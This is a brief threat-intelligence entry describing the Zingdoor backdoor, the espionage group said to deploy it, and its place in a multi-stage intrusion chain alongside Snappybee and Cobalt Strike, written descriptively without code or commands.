Zingdoor

Zingdoor is a malicious software, or malware, that serves as an HTTP backdoor, written in Golang, and is frequently deployed by Earth Estries, a cyber-espionage group. The malware infects systems through suspicious downloads, emails, or websites and can disrupt operations, steal personal information, or even ransom data once inside. Zingdoor is part of a diverse toolkit used by Earth Estries to gain control over target machines, which also includes Cobalt Strike, Snappybee, and other tools such as ChinaChopper, PortScan, and NinjaCopy. In one observed infection chain, Earth Estries exploited vulnerable Exchange servers using web shells and various backdoors including Zingdoor, Snappybee, and Cobalt Strike. Following the port scanning step, a set of Zingdoor malware was downloaded, showcasing a different approach using diverse malware and utility tools delivered via curl downloads. In some instances, Zingdoor was utilized as a first-stage backdoor, indicating its primary role in initiating the attack process. During the later stages of the attack routine, we observed successive deployments of additional backdoors through preceding installations, typically from Zingdoor to Snappybee and then to Cobalt Strike, although the order of deployment varied. Lateral movement within the network was performed by the initial backdoor, with subsequent installations of Zingdoor and Snappybee (Deed RAT) on other machines. Snappybee, known as Deed RAT, is a modular backdoor said to be the successor to ShadowPad, primarily executed through DLL sideloading.